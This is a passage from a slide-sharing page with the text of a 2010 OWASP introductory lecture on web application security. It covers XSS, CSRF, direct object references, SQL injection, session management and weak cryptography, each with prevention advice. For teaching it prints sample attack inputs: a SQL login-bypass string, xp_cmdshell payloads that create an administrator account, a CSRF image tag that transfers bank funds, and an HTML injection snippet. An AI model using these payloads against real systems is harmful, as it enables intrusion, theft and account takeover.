vkprintingsolution
 
sorcesofdrugs-160228074 56 4246643544 (3).ppt
sorcesofdrugs-160228074 56 4246643544 (3).pptsorcesofdrugs-160228074 56 4246643544 (3).ppt
sorcesofdrugs-160228074 56 4246643544 (3).ppt
IndalSatnami
 
Pixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
Pixida, Simplifying Success in Germany, the USA, Brazil, China and PortugalPixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
Pixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
TechMeetups
 
Stakeholders Management GT 11052021.cleaned.pptx
Stakeholders Management GT 11052021.cleaned.pptxStakeholders Management GT 11052021.cleaned.pptx
Stakeholders Management GT 11052021.cleaned.pptx
SaranshJeena
 
Employment Communication : The Job HUnting.pptx
Employment Communication : The Job HUnting.pptxEmployment Communication : The Job HUnting.pptx
Employment Communication : The Job HUnting.pptx
JunaidAlvi5
 
RightShip-Inspection-Maritime-Safety-Simplified.pptx
RightShip-Inspection-Maritime-Safety-Simplified.pptxRightShip-Inspection-Maritime-Safety-Simplified.pptx
RightShip-Inspection-Maritime-Safety-Simplified.pptx
ultronmeg
 
Ad

WebApps_Lecture_15.ppt

  • 1. Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org WebAppSec 101: OWASP Top 10 and WebGoat Kyle OWASP UCI Chapter Lead 5/17/2010
  • 2. OWASP Quick OWASP Background Open Web Application Security Project OC chapter lead by Neil Matatall, original creator of this presentation Upcoming conference on Tue, Sept 7th AppSec US 2010 @ UCI
  • 3. OWASP OWASP’s Top 10 List 1. Injection Flaws a) SQL Injection, XPATH Injection, etc 2. Cross-Site Scripting (XSS) 3. Broken Authentication and Session Management 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Security Misconfiguration 7. Insecure Cryptographic Storage 8. Failure to Restrict URL Access 9. Insufficient Transport Layer Protection 10. Unvalidated Redirects and Forwards From OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
  • 4. OWASP What We’re Covering 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 5. OWASP Cross-Site Scripting (XSS) Attacks Malicious code that can change the look and function of a legitimate web application Originates from old phishing attacks but less obvious and more dangerous to the user/victim More widespread now because of move to more rich Internet applications using dynamic content and JavaScript and the latest AJAX trend My favorite XSS resource OWASP Cross-site Scripting (XSS)
  • 6. OWASP Websites XSS’d A hacker was able to insert JavaScript code into the Obama community blog section The JavaScript would redirect the users to the Hillary Clinton website YouTube Demonstration Read about it on ChannelWeb Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs.
  • 8. OWASP The Impact of XSS Data residing on the web page can be sent anywhere in the world Including cookies! Facilitates many other types of attacks Cross-Site Request Forgery (CSRF), Session Attacks (more later) Your site’s behavior can be hijacked
  • 10. OWASP Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities  <script> becomes &lt;script&gt;  but still displayed as <script> Methods:  OWASP ESAPI  Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet
  • 11. OWASP Preventing XSS - Continued Ensure your filter uses a white list approach Filters based on blacklisting have historically been flawed  E.g. PHP, Ruby on Rails sanitize method New encoding schemes can easily bypass filters that use a blacklist approach Do not accept and reflect unsolicited input Reflecting every parameter for confirmation pages Printing out the session/request parameters in error pages Great XSS Test Fixture: http://ha.ckers.org/xss.html
  • 12. OWASP This Presentation's Re-ordered List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 13. OWASP Cross Site Request Forgery (CSRF) From http://www.owasp.org/index.php/Top_10_2010-Main: “A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
  • 14. OWASP Cross Site Request Forgery (CSRF)  Occurs when an authenticated user unknowingly initiates a request  The request is handled as if it were intentional  Usually happens without the user being aware!  CSRF attacks are difficult to track  Commands are executed in the context of the victim  The request comes from the users IP address so it is difficult to hunt down the hacker  The hacker is essentially given all of the user’s privileges  XSS facilitates CSRF via “Link Injection”
  • 15. OWASP CSRF Example  A hacker posts to a message board containing an image tag  <img src= “http://yourbank.com/transfer? to_account=my_account_number&amount=all_of_your_money>  An unsuspecting user logs into yourbank.com and authenticates  The user then visits said message board  A request is issued from the victim’s browser to the bank’s website  The bank’s website transfers the user’s money to the hacker’s account
  • 16. OWASP CSRF In the Real World Netflix vulnerabilities allowed attackers to change the shipping addresses, email address, password, and movie queues Novell GroupWise WebAccess was found to contain a CSRF (and XSS) vulnerability that allowed an attacker to receive copies of any compromised email account Sun’s IdM allowed hackers to change the passwords of admin accounts
  • 17. OWASP Solution Add a secondary authentication mechanism  Such as an impossible to guess token Require a confirmation page before executing potentially dangerous actions Eliminate XSS vulnerabilities Use POST as your form action and only accept POST requests on the server for sensitive data !  Incoming CSRF requests will fail since the parameter is in the URL and not the post body You can protect yourself with RequestPolicy (Firefox extension)
  • 18. OWASP This Presentation's Re-ordered List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 19. OWASP Insecure Direct Object Reference  “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.”  Fancy term for parameter tampering  Involves modifying parameters to access unauthorized materials  E.g. /BankAccount.jsp?acct_nmbr=123  The hacker modifies the parameter to view another users account
  • 21. OWASP Solution  Properly validate data!  Cookie data, URL parameters, all HTML Form data (even hidden, select, radio and checkbox types)  Restricting length of HTML text boxes, options in select boxes, and JavaScript validation can all be easily sidestepped and are not secure  All input data MUST be validated server side for each request – client side validation is EASILY bypassed  Do not expose internals to the user  Such as IDs (if possible/necessary)  Use an indirect reference map with hard to guess keys (hash)  POST /BankAccount.jsp?acct_nmbr=d83OJdm3  The server then uses the key to get the real value  Key: d83OJdm3 value: 123
  • 22. OWASP Use Proper Authorization  Architect your application to check authorization with every request  Back to the bank example  Before: select * from accounts where account_number = ?  After: select * from accounts where account_number = ? and user_id =?
  • 23. OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 24. OWASP UCLA Security Incident 30,000 people affected directly; 800,000 notifications sent out 12/2006 Unsupported/forgotten legacy web application was targeted with escalated database privileges Web application vulnerability exposed data online using SQL injection Hacked server was then used to gain access to more sensitive servers
  • 25. OWASP SQL Injection Attacks “SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements. “ (Wikipedia)
  • 26. OWASP Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS
  • 27. OWASP SQL Injection Attacks Login Example Attack Text in blue is your SQL code, Text in orange is the hacker input, black text is your application code Login: Password: Dynamically Build SQL String performing authentication: “SELECT * FROM users WHERE login = ‘” + userName + “’ and password= ‘” + password + “’”; Hacker logs in as: ‘ or ‘’ = ‘’; -- SELECT * FROM users WHERE login = ‘’ or ‘’ = ‘’; --‘ and password=‘’
  • 28. OWASP More Dangerous SQL Injection Attacks Hacker creates a Windows Account: SELECT * FROM users WHERE login = ‘’; exec master..xp_cmdshell 'net users username password /add';--’ and password= ’’ And then adds himself as an administrator: SELECT * FROM users WHERE login = ‘'; exec master..xp_cmdshell 'net localgroup Administrators username /add';--’ and password= ‘’ SQL Injection examples are outlined in:  http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf  http://www.unixwiz.net/techtips/sql-injection.html
  • 29. OWASP Exploits of a Mom http://xkcd.com/327/
  • 31. OWASP Preventing SQL injection Use Prepared Statements (aka Parameterized Queries) $id=1234 “select * from accounts where id = “ + $id vs “select * from accounts where id =1234” Validate input Strong typing  If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters (ticks, --, semi-colon, brackets, etc.)
  • 32. OWASP Mimimize the Impact of SQL injection Quiz: Is running a Web Application as the Database System Admin “sa” account a good practice? Use the principle of least privilege If the query is reading the database, do not run the query as a user with update permissions (dbo, drop, etc)
  • 33. OWASP Injection Impacts More Than SQL “Injection Flaw” is a blanket term SQL Injection is most prevalent Other forms: XPath Injection Command Injection LDAP (Lightweight Directory Access Protocol) Injection DOM (Document Object Model) Injection JSON (Javascript Object Notation) Injection Log Spoofing On and on and on…
  • 34. OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 35. OWASP Authentication Checks  From http://www.owasp.org/index.php/Top_10_2010-Main “Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”  Never store passwords in plaintext  Encrypt or Hash+Salt (preferred)  Architect applications to check every request to see that the authentication data is still valid  Issue a new session token when a change in privilege occurs  ASP reuses session IDs by default!  If you absolutely must use “remember me” functionality, use a difficult to guess authentication cookie  Authentication data is sent with every request, so protect it
  • 36. OWASP Session Attacks Session Fixation: The hacker predicts a valid session key (usually via phishing) Session Hijacking: The hacker masquerades as another user by stealing the users session id (usually via XSS)
  • 38. OWASP Hardening Authentication  Every request to each page of a web application should be revalidated for proper authenticated and authorized access  Check validity of authentication cookie on each request. Validate original IP address is the same as current request IP and age since created or last checked. Deny access if not.  Check that the authenticated user is authorized to access your application (using internal database of users, LDAP, authorization service, etc) on each request
  • 39. OWASP Solution Use built in session management! Most application servers do a pretty good job of this (except ASP, boo Microsoft) Use secure randomly generated session keys to make prediction impossible Don’t expose the user to session ids if possible Use reasonable session timeouts
  • 40. OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 41. OWASP Failure to Restrict URL Access  “Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. “  Can be caused by:  Improper authentication  Incorrect authorization  Unprotected admin areas  Usually caused by easy to guess URLs  .htaccess is your friend!
  • 42. OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 43. OWASP Insecure Cryptographic Storage  From http://www.owasp.org/index.php/Top_10_2007 : “Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.”  Use latest standard encryption methods  They are standards for a reason! And they change over time  Use strong standard encryption methods  Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm (SHA1), Data Encryption Standard (DES)  Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)  Encrypt stored passwords with above methods
  • 44. OWASP “MD5 Considered Harmful Today” MD5 has been known to have serious weaknesses which produce collisions It has been considered a weak hash function since at least 2004 Using knowledge of MD5 collisions, researchers were able to impersonate a root CA common to all browsers This rogue CA can issue SSL certificates that even the knowledgeable end user may not notice http://www.win.tue.nl/hashclash/rogue-ca/

Editor's Notes

  • #47: WIFI Example "/><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/oHg5SJYRHA0&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><font color="black">@gmail.com